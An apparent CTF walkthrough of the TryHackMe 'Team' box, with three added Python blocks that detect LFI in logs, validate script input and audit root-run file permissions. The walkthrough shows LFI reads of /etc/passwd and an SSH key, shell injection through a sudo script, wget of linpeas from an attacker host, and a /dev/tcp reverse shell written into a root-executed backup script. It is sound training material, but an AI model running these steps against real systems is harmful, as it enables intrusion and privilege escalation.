TryHackMe: Team

DebianHat
6 min read · Mar 12, 2021

Content:

  1. Introduction
  2. Scanning and enumeration
  3. Initial footholds
  4. Exploitation and Privilege Escalation
  5. Conclusion

Introduction:

TryHackMe boxes are always a new learning experience; every box has something new to teach. This box is a boot2root Linux machine.
It is one that will make you scratch your head during the initial phase of enumeration, and there is more than one way to get to root.
This box will add a lot of web enumeration skills to your skill set: discovering directories, files and virtual hosts, and exploiting a local file inclusion vulnerability.
With all that being said, let’s jump right in.

Scanning:

Once the machine is up and running, start with an initial Nmap scan to learn which ports are open and which services are running on them.

$ nmap -v -sV -sC [machine-ip]

The Nmap scan returns 3 open ports, 21, 22 and 80, running FTP, SSH and Apache httpd respectively.
FTP does not allow anonymous login, and we don’t have any credentials yet to move forward with FTP or SSH, so let’s see what can be extracted from the web server.

Browsing to the machine IP lands on a default Apache page, which doesn’t give us much.
After some common enumeration (robots.txt, directory brute forcing) there was nothing, and it seemed like a dead end at that point, but one thing was left to check: the page source. Looking through the source, the page title carried one relevant piece of info:
“If you see this add team.thm to your hosts!”

After adding team.thm to the hosts file, browsing to team.thm lands on a Bootstrap page with nothing useful on it.
With more enumeration, robots.txt gives a name that might be a username, “dale”, and directory brute-forcing returns some files and directories, of which “scripts” looks interesting; fuzzing further into that directory might turn up something useful.

$ gobuster dir -u http://team.thm -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt

$ gobuster dir -u http://team.thm/scripts -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,js,txt

(Screenshot: robots.txt output)
(Screenshot: gobuster output)

One thing worth telling: running gobuster against the scripts directory was a total blind shot. At the same time I ran wfuzz for DNS fuzzing, in case some other domain was also associated, and guess what: the results came back with one sub-domain (dev), while gobuster returned the script.txt file.

$ wfuzz -c --hw 977 -u http://team.thm -H "Host: FUZZ.team.thm" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

Keeping the discovered sub-domain aside for a while and heading to http://team.thm/scripts/script.txt: it is a bash script, and at the end there is a note saying “Had to change the extension of old ‘script’ in this folder, as it has creds in”. That suggests there is one more script file in this same directory with some other extension. We could go ahead and look for that file by throwing more relevant extensions at it, but on the other hand I was compelled to look at the (dev) sub-domain, assuming it to be some under-development page or similar.

Initial Footholds:

A lot of enumeration has been done up to this point, and it looks like we can pop an initial shell.

http://dev.team.thm gives us a page with a placeholder team share link, which points to a teamshare.php file being read.
That looks suspicious: if the page can read a PHP file, we can try reading other files present on Linux servers, which would make this a Local File Inclusion (LFI) vulnerability.

Trying to read some of the most common files on a Linux file system, like /etc/passwd, was successful.
Taking a close look at /etc/passwd, it can be inferred that there are 3 users capable of popping a bash shell (gyles being a new one). If that is the
case, it might be possible to read the private SSH keys of the current user.

With all positive hopes, I requested the /etc/ssh/sshd_config file to see if SSH keys could be obtained that way, and it was a success: 200.
We received Dale’s private SSH key.
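Two defensive counterparts to the LFI described above, added here as an example and not code from the box or from the original post: a strict share-name resolver of the kind teamshare.php evidently lacked, and a detector that flags traversal and sensitive-file reads in Apache access-log lines. The log lines, the /script.php endpoint and its page parameter are constructed for the example; this page does not name the box's actual include parameter.

```python
import os
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-log lines (not taken from the box). The endpoint and
# parameter name are assumptions made for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2021:10:01:02 +0000] "GET /script.php?page=teamshare.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2021:10:01:40 +0000] "GET /script.php?page=../../../../etc/passwd HTTP/1.1" 200 2140 "-" "curl/7.74"
10.0.0.9 - - [12/Mar/2021:10:02:11 +0000] "GET /script.php?page=/etc/ssh/sshd_config HTTP/1.1" 200 4031 "-" "curl/7.74"
10.0.0.9 - - [12/Mar/2021:10:02:30 +0000] "GET /script.php?page=%2Fhome%2Fdale%2F.ssh%2Fid_rsa HTTP/1.1" 200 1675 "-" "curl/7.74"
10.0.0.7 - - [12/Mar/2021:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 115 "-" "Mozilla/5.0"
"""

# Client IP, request target and status code from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Values no legitimate include parameter should carry: traversal, absolute paths,
# and the files an LFI is typically pointed at (the post reads exactly these).
SENSITIVE = re.compile(r'(\.\./|^/|/etc/passwd|/etc/ssh/|id_rsa|\.ssh/)')


def find_lfi_attempts(log_text):
    """Return (ip, param, decoded_value, status) for every request whose query
    string carries a traversal or sensitive-file value. URL-decoding happens in
    parse_qsl, so %2F-encoded paths are caught as well."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            if SENSITIVE.search(value):
                hits.append((m.group("ip"), key, value, int(m.group("status"))))
                break
    return hits


def safe_share_path(base_dir, requested, allowed_suffixes=(".php", ".html")):
    """Resolve a user-supplied share name strictly inside base_dir.
    Rejects anything that is not a bare file name with an expected extension and
    re-checks the resolved path, so '../../etc/passwd' or '/etc/ssh/sshd_config'
    can never reach the include. Raises ValueError on rejection."""
    base = os.path.realpath(base_dir)
    if not requested or "/" in requested or "\\" in requested or requested in (".", ".."):
        raise ValueError("share name must be a bare file name")
    if not requested.endswith(allowed_suffixes):
        raise ValueError("unexpected file type")
    full = os.path.realpath(os.path.join(base, requested))
    if os.path.dirname(full) != base:
        raise ValueError("resolved outside the share directory")
    return full


if __name__ == "__main__":
    for ip, param, value, status in find_lfi_attempts(SAMPLE_LOG):
        print(f"{ip} read {value!r} via parameter {param} (HTTP {status})")
```

A status of 200 on a flagged line is the signal that the read succeeded, which is what distinguishes an exposure from a blocked probe; that is the line to alert on first.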

Once the file is loaded it all looks distorted, but view the page source and the id_rsa key can be copied in proper format. Don’t forget to remove the hash (#) symbol from the beginning of every line and set the required permissions.
Now we are ready to log in as Dale through SSH.

$ sudo chmod 600 id_rsa
$ ssh -i id_rsa dale@team.thm

Upon successful login, we get a stable shell as user dale.

Exploitation and Privilege Escalation:

We have a shell and the user flag; now what? I don’t think we can escalate straight to root, as one more user, “gyles”, was mentioned. Before running automated scripts like LinPEAS or LinEnum, a bit of manual enumeration is worthwhile.

$ sudo -l

User dale can run admin_checks as gyles without a password. So, let’s have a look at how we can exploit this further.

This is a simple script that takes 2 user inputs, first a “name” and then a “date”. The 1st input is written to a text file, /var/stats/stats.txt, which is of no use here. The interesting part is the 2nd input, which is run with its error thrown away to 2>/dev/null, and that can be used to get a shell.

$ sudo -u gyles /home/gyles/admin_checks
Enter anything when prompted for the name, it doesn’t matter; what matters is the date: enter “/bin/bash -i” there and you will be dropped into an unstable shell.

$ python3 -c "import pty;pty.spawn('/bin/bash')"
$ export TERM=xterm
(stabilizing the shell)
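The root cause in admin_checks is that the second input is handed to the shell instead of being treated as data. As an added example (not the box's script and not code from the original post), here is the same two-input check written so the date can only ever be a date: the value is validated against a fixed format and parsed with datetime, and nothing the user typed is ever executed. The stats-file path is the one the post mentions; the input format and name rules are assumed.

```python
import re
from datetime import datetime

STATS_FILE = "/var/stats/stats.txt"       # path named in the post
NAME_RE = re.compile(r"^[A-Za-z0-9 _.-]{1,64}$")  # assumed: no shell metacharacters
DATE_FORMAT = "%Y-%m-%d"                  # assumed input format


def parse_check_date(text):
    """Accept only a real calendar date in DATE_FORMAT; anything else is rejected.
    The original script passed this value to the shell, which is why '/bin/bash -i'
    worked. Parsing the value instead of executing it closes that hole."""
    text = text.strip()
    if len(text) != len("2021-03-12"):
        raise ValueError("date must look like YYYY-MM-DD")
    return datetime.strptime(text, DATE_FORMAT).date()


def format_stat_line(name, date_text):
    """Validate both inputs and return the line that would be appended to the stats file."""
    name = name.strip()
    if not NAME_RE.match(name):
        raise ValueError("name may contain only letters, digits, space, '_', '.' and '-'")
    day = parse_check_date(date_text)
    return f"{day.isoformat()} {name}\n"


def record_check(name, date_text, path=STATS_FILE):
    """Append the validated record; no subprocess is spawned anywhere in this script."""
    line = format_stat_line(name, date_text)
    with open(path, "a") as fh:
        fh.write(line)
    return line


if __name__ == "__main__":
    name = input("Enter your name: ")
    date_text = input("Enter the date (YYYY-MM-DD): ")
    try:
        print("recorded:", record_check(name, date_text).strip())
    except ValueError as err:
        print("rejected:", err)
```

If a timestamp from the system clock is what the script really wanted, datetime.now() gives it without spawning anything; a sudo rule that runs a script as another user should never need to interpolate user input into a command line.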

Here manual enumeration wasn’t worth much, so going through one of the automated scripts was the better option.

Attacker machine:
$ python3 -m http.server 8080

Target machine:
$ cd /tmp
$ wget http://[attacker-ip]:8080/linpeas.sh
$ chmod a+x linpeas.sh
$ ./linpeas.sh

LinPEAS returns 2 backup files, one of which (/usr/local/bin/main_backup.sh) is writable by the admin group and is executed by root. Looking carefully, gyles belongs to the admin group.

$ echo "bash -i >& /dev/tcp/[attacker-ip]/[port] 0>&1" > /usr/local/bin/main_backup.sh
Don’t forget to start a listener on your own machine.

And there it goes, voilà: we have a root shell.
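The privilege escalation works because a file root executes is writable by a non-root group. The following audit, an added example and not part of the original post or of LinPEAS, flags scripts that a lesser account could edit or replace (wrong owner, group- or world-writable, writable parent directory, symlink). The demo() helper builds a throwaway directory with a constructed main_backup.sh to show the finding; the candidate path list in the main block is assumed apart from the path the post names.

```python
import glob
import os
import shutil
import stat
import tempfile


def audit_root_scripts(paths, trusted_uid=0):
    """Return (path, reason) findings for files root will execute that a lesser
    account could modify or replace. trusted_uid is the owner we expect (root)."""
    findings = []
    for path in paths:
        try:
            st = os.lstat(path)
        except FileNotFoundError:
            continue
        if stat.S_ISLNK(st.st_mode):
            findings.append((path, "is a symlink; its target could be swapped"))
            continue
        if st.st_uid != trusted_uid:
            findings.append((path, f"owned by uid {st.st_uid}, expected {trusted_uid}"))
        if st.st_mode & stat.S_IWOTH:
            findings.append((path, "world-writable"))
        elif st.st_mode & stat.S_IWGRP and st.st_gid != 0:
            # The box's situation: main_backup.sh was writable by the admin group.
            findings.append((path, f"group-writable (gid {st.st_gid})"))
        # Whoever can write the directory can replace the file outright.
        parent = os.path.dirname(path) or "."
        pst = os.stat(parent)
        if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
            findings.append((path, f"parent {parent} is world-writable without the sticky bit"))
    return findings


def demo():
    """Create a temporary directory holding a constructed backup script with the same
    class of defect as the box's main_backup.sh, audit it, and clean up."""
    workdir = tempfile.mkdtemp(prefix="backup_audit_")
    good = os.path.join(workdir, "old_backup.sh")
    bad = os.path.join(workdir, "main_backup.sh")
    for path in (good, bad):
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\ntar czf /var/backups/www.tgz /var/www\n")  # constructed contents
    os.chmod(good, 0o755)  # only the owner can write: fine
    os.chmod(bad, 0o777)   # anyone can write: anyone can plant commands root will run
    try:
        return audit_root_scripts([good, bad], trusted_uid=os.getuid())
    finally:
        shutil.rmtree(workdir)


if __name__ == "__main__":
    candidates = ["/usr/local/bin/main_backup.sh"]  # path named in the post
    for pattern in ("/etc/cron.d/*", "/etc/cron.*/*", "/usr/local/bin/*.sh"):  # assumed locations
        candidates.extend(glob.glob(pattern))
    for path, reason in audit_root_scripts(candidates):
        print(f"{path}: {reason}")
    print("demo findings:", demo())
```

The fix on the box side is the mirror of the findings: root:root ownership, mode 0755 or tighter, and a parent directory that only root can write. Running the audit from cron against the paths root actually executes turns a one-off LinPEAS observation into a standing check.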

Conclusion:

The box was an easy one, but a lot of enumeration was required.

Vulnerabilities:
1. Publicly available under-development domain, leading to a Local File Inclusion vulnerability.
2. Web server configuration: SSH keys were readable by the web-hosting user.
3. Weak script code which ran its input, producing an error and throwing it to 2>/dev/null.
4. Inappropriate permissions: a root-executed backup file had read/write permission for the gyles user.

That’s all for this box.
Thanks for reading.
There are definitely many ways to solve this box. Here we missed out on FTP, which surely had something, and on the script file with the other extension, which could have led to FTP or SSH credentials.

Happy Hacking !!


DebianHat

Penetration Tester, Ethical Hacker, Security Analyst